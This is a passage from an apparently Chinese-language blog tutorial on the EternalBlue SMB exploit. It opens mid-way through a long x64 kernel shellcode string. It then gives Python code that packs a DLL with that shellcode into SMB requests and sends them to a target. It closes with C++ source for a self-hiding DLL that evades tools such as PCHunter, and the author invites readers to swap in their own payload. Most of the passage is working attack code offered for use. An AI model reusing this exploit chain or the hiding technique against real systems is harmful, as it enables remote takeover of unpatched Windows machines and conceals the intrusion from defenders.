x48x89xC1x48x83xC1x0Cx4Dx31xD2x44x8Bx11x4Cx01xD7x49x89xC2x49x83xC2x08x41x8Bx0Ax52x4Cx8Dx8DxAAx00x00x00x4Cx8Bx85xA6x00x00x00x48x89xCAx48x89xF9x48x83xECx20xFFx56x30x48x83xC4x20x5Ax48x85xC0x74x08x48xFFxC2xE9x19xFFxFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x52x57x48xBAx00x00x00x00x00x00x00x00xEBx0Cx52x57x48xBAx01x00x00x00x00x00x00x00x48x8Bx45x20x4Cx8Bx55x08x49x83xC2x28x48x31xFFx41x8Bx3Ax48x01xF8x49xB8x00x00x00x00x00x00x00x00x48x8Bx4Dx20x48x83xECx20xFFxD0x48x83xC4x20x48x31xC0x5Fx5AxC3x48x39xECx0Fx8DxAAx00x00x00x57x56x53x48x89xE6x48x83xC6x0Cx55x6Ax00x48x89xE3x51x52x48x89xE9x48x29xF1x48x83xF9x08x0Fx8Cx81x00x00x00x50x52x53x48xB8x0Fx00x00x00x00x00x00x00x48x6BxC0x08x48x39xC8x7Dx03x48x89xC1x48xBAx00x00x00x00x00x00x00x00x48x89xC8x48xBBx08x00x00x00x00x00x00x00x48xF7xFBx48xFFxC8x6Ax00x48x83xF8x00x75xF5x48x01xCCx5Bx5Ax58x48x89xE5x48x89xE7x48x29xCFx48x89xFCxF3xA4x48x89x23x48x8Bx4BxF8x48x8Bx53xF0x48xC7x43xF8x00x00x00x00x48xC7x43xF0x00x00x00x00x48xC7x04x24xFFxFFxFFxFFx48xBExEExEExEExEExEExEExEExEExFFxE0x59x59x5Dx5Dx5Bx5Ex5FxFFxE0x48x89xE1x48x2Bx4Dx08x48x83xE9x04x48x89xECx48x83xC4x0Cx5Dx5Bx5Ex5Fx5Ax48x01xCCxFFxE2x00x00x00x00x57x52x53x51x48xB8x08x00x00x00x00x00x00x00x48xBAx0Cx00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x83xC2x04x48x31xDBx8Bx1Ax48xC1xEBx02x48xB8x0Fx00x00x00x00x00x00x00x48xF7xE3x48x89x45x68x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xC2x48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x74x7Cx48x89x45x60x48x8Bx46x58x48x8BxBDxAEx00x00x00x48x83xC7x03x48x89x07x48x8Bx46x68x48xA9x00x00x00x00x74x2Ex48x8Bx85xBEx00x00x00x48x8Bx9DxC6x00x00x00x48x89x03x48x8Bx5Ex60x48x8BxBDxC6x00x00x00x48x29xDFx48x8Bx9DxB6x00x00x00x48xFFxC3x48x89x3BxEBx14x48x8Bx85xBEx00x00x00x48x8BxBDxB6x00x00x00x48xFFxC7x48x89x07x48x8Bx46x68x48xA9x01x00x00x00x74x14x48x8BxBDxB6x00x00x00xC6x07xBFxEBx08x48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x56x50x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x89xEEx48x81xC6x80x00x00x00x48xB9x0Fx00x00x00x00x00x00x00xF3xA4x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x00x48xFFxC7x48x8Bx55x40x48x8Bx1Ax48x89x1Fx48x8BxB5xCEx00x00x00x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x0Ax48xFFxC7x48x83xC7x08x48x29xFEx48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x0Ax48xFFxC7x48x89x37x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x8Bx75x40x48x89x3Ex48x8Bx45x70x48x83xC0x0Fx48x89x45x70x58x5Ex59x5Bx5Ax5FxC3x57x52x53x51x56xEBx4Dx48x8Bx7Dx00x48x89xDAx48x83xC2x0Cx48x03x3Ax48x89xE9x48x81xC1x8Fx00x00x00x48x89xFAx48x83xECx20xFFx56x28x48x83xC4x20x48x85xC0x74x22x48x89xE9x48x81xC1x9Ax00x00x00x48x89xFAx48x83xECx20xFFx56x28x48x83xC4x20x48x85xC0x74x05x48x31xC0xEBx0Cx48xB8x01x00x00x00x00x00x00x00xEBx00x5Ex59x5Bx5Ax5FxC3x57x52x53x51x56x48x8Bx7Dx48x48x89xFAx48x83xC2x00x66x8Bx1Ax66x81xFBx4Dx5Ax0Fx85x9Bx00x00x00x48x89xFAx48x83xC2x3Cx48x31xDBx8Bx1Ax48x01xDFx48x89xFAx48x83xC2x00x48x31xDBx8Bx1Ax48x81xFBx50x45x00x00x75x77x48x89xFEx48x83xC6x14x48x31xDBx66x8Bx1Ex48x89xFEx48x83xC6x18x48x01xDEx48x89xFBx48x83xC3x06x48x31xC9x66x8Bx0Bx48x31xD2x48x89xF3x48x83xC3x0Cx48x8Bx7Dx48x4Dx31xD2x44x8Bx13x4Cx01xD7x48x39xF8x7Cx2Bx48x89xF3x48x83xC3x08x4Dx31xD2x44x8Bx13x4Cx01xD7x48x39xF8x7Dx16x49x89xF2x49x83xC2x24x48x31xDBx41x8Bx1Ax48xF7xC3x00x00x00x20x75x11x48x83xC6x28x48xFFxC2x48x39xCAx7CxB0x48x31xC0xEBx0Cx48xB8x01x00x00x00x00x00x00x00xEBx00x5Ex59x5Bx5Ax5FxC3xEBx4Dx90x90x90x90x90x90x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1Ex00x00x00x21x0Dx00x00x4Ex0Dx00x00x00x09x00x00x00x5Ex0Dx00x00x00x00x00x00x00x00x00x00xE8x00x00x00x00x58x48x8Bx60xC6x48x8Bx68xCEx48x8Bx70xD6x48x8Dx0DxCAxFFxFFxFFx48x83xECx20xFFx56x40x48x83xC4x20xE9x11x01x00x00x4Cx89xC6xE9x09x01x00x00x54x55x51x52x53x56x57x48x31xDBx65x48x8Bx5Bx30x48x8Bx5Bx60x48x8Bx5Bx18x48x8Bx5Bx10x48x8Bx73x60x48x85xF6x0Fx84xA6x00x00x00x48x8Bx6Bx30x48x85xEDx0Fx84x99x00x00x00x48x31xD2xC1xC2x05x66xADx0Cx20x30xC2x66x83x3Ex00x75xF1x48x8Bx1Bx48x3Bx54x24x20x75xCAx48x89xEFx66x81x3Fx4Dx5Ax75x73x8Bx7Dx3Cx48x01xEFx81x3Fx50x45x00x00x75x65x48x89xF9x48x83xC1x18x48x85xC9x74x59x48x31xD2x8BxBFx88x00x00x00x48x01xEFx8Bx57x1Cx48x01xEAx8Bx5Fx20x48x01xEBx8Bx7Fx24x48x01xEFx49x89xD1x8Bx33x48x01xEEx48x31xD2xC1xC2x05xACx0Cx20x30xC2x80x3Ex00x75xF3x48x3Bx54x24x18x74x0Cx48x83xC7x02x48x83xC3x04xE2xDAxEBx10x48x0FxB7x17x48xC1xE2x02x4Cx01xCAx8Bx02x48x01xE8x5Fx5Ex5Bx5Ax59x5Dx5CxC3x06xDFxB0x2Cx51x33x8Ax8DxA4x00x78x95x27x85x00x3Bx00xA1xB4x00xDBxB6xB6xE5x00xC4x22x07xE2x00x82x5Ax15x4Ax00x02x55xF0xD6xDEx79x03xAAx86x00x0DxC4x8AxDCx00x00x48x8Bx26x50x48x31xC0x48x8Dx0Dx33x00x00x00x48x8Dx1Dx2Cx00x00x00x48x29xD9x48x89xDFxF3xAAx48x8Dx0Dx0Dx00x00x00x48x8Dx1Dx96xF0xFFxFFx48x29xD9x48x89xDFxF3xAAx58x41x5Fx41x5Ex41x5Dx41x5Cx5Ex5Fx5Dx5BxC3xEBx08x00x14x00x00x01x00x00x00"
f = open(dllfile,"rb")
dll_hex = f.read()
f.close()
#dll_hex += "x00"*3
array , ncount = make_smb_request(kernel_shellcode + dll_hex,key)
for i in range(ncount):
#print binascii.b2a_hex(array[i])
print i+4,",len:",len(array[i])
s.sendall(array[i])
data = s.recv(1024)
print i+4,"--->",data
#end1
step_7_data ="x00x00x00x23xFFx53x4Dx42x71x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00x00x00x00"
s.sendall(step_7_data)
data = s.recv(1024)
print 7,data
#end2
step_8_data ="x00x00x00x27xFFx53x4Dx42x74x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00x02xFFx00x27x00x00x00"
s.sendall(step_8_data)
data = s.recv(1024)
print 8,data
print "------Inject dll done!------"
s.close()
0x5: 永恒之蓝 + 自隐藏模块注入
我们写的win7下的exploit功能就算基本完成了,但是如果要想完成一次成熟的攻击, 不可能注入了进程之后进程又崩掉了,dll注入是和权限有直接关系的,Doubleplusar执行后是nt权限,可以采用无模块注入来注入到受害者的机器测试后发现同时也解决进程崩掉的问题这里顺便提一下无模块注入中的一些知识。关于dll注入和 x86 x64 进程互写互读的知识有兴趣可以去看看. 这里介绍一种关于模块自隐藏的知识
:DllMain第一次执行时,申请一块内存把DLL文件进行模拟加载,然后再调用模拟加载PE的DllMain,第二次的DllMain就在非模块的内存中执行了。DLL自卸载说起来也不难,是用MOMODALMARK标记DllMain的返回值 类似于MemoryLoadLibrary 的功能
上代码:
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include "MemoryLoad.h"
//创建一个进程互斥量 防止无模块DLL多次注入
BOOL IsMutexExist(char* pstrMutex)
{
BOOL bRet = FALSE;
HANDLE hMutex = NULL;
hMutex = CreateMutexA(NULL, TRUE, pstrMutex);
if (hMutex)
{
if (GetLastError() == ERROR_ALREADY_EXISTS)
bRet = TRUE;
ReleaseMutex(hMutex);
CloseHandle(hMutex);
}
else
{
bRet = TRUE;
}
return bRet;
}
//调用LoadPE.cpp里的函数,自行处理PE加载,把DLL在新申请的内存加载起来,并执行入口函数
void LaunchNoModule()
{
LaunchDll((char*)dllModuleName, NO_MODULE_MARK);
}
unsigned int __stdcall NoModuleThread(void* lpParameter)
{
while (TRUE)
{
Sleep(1000);
OutputDebugString(L"Test by IronMan.");
}
return TRUE;
}
//调用LoadPE.cpp里的函数,自行处理PE加载,把DLL在新申请的内存加载起来,并执行入口函数
void NoModuleEntryCall(HMODULE hModule, DWORD ul_reason_for_call, char* pstrModuleName)
{
TCHAR szMutexName[MAX_PATH];
wsprintf(szMutexName, L"Test 15pb bingo! %d", GetCurrentProcessId());
g_hMutex = CreateMutex(NULL, TRUE, szMutexName);
TCHAR szLog[MAX_PATH] = { 0 };
wsprintf(szLog, L"NoModuleEntryCall Module Start:%p", hModule);
OutputDebugString(szLog);
//下面为正常Dll功能代码
CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)NoModuleThread, NULL, NULL, NULL);
}
BOOL ChooseSub(HMODULE hModule, DWORD ul_reason_for_call, char* pstrModuleName)
{
BOOL bRet = FALSE;
GetModuleFileNameA(NULL, exeModuleName, MAX_PATH);
if (ul_reason_for_call == NO_MODULE_MARK)
// strcpy((char*)dllModuleName,pstrModuleName);
int a = 1;
else
GetModuleFileName(hModule, dllModuleName, MAX_PATH);
if (ul_reason_for_call == NO_MODULE_MARK)
{
NoModuleEntryCall(hModule, DLL_PROCESS_ATTACH, 0);
bRet = TRUE;
}
else
{
LaunchNoModule();
bRet = FALSE;
}
return bRet;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
BOOL bRet = FALSE;
if (ul_reason_for_call == DLL_PROCESS_ATTACH || ul_reason_for_call == NO_MODULE_MARK)
{
TCHAR szMutexName[MAX_PATH];
wsprintf(szMutexName, L"yanshier2013nomoduleinject%d", GetCurrentProcessId());
if (IsMutexExist((char*)szMutexName))
return FALSE;
bRet = ChooseSub(hModule, ul_reason_for_call, (char *)lpReserved);
}
else
{
if (ul_reason_for_call == DLL_PROCESS_DETACH)
{
ReleaseMutex(g_hMutex);
CloseHandle(g_hMutex);
bRet = TRUE;
}
}
return bRet;
}
我注入了NTFSinfo这个程序.用PChunter是看不到自己注入的模块的
每隔一秒用 OutputString打印出一句 Test by IronMan. 需要的话直接在NoModuleThread替换功能就可以了。
自卸载dll源码编译 vs2010 vs2013
源码打包地址: http://pan.baidu.com/s/1miObL00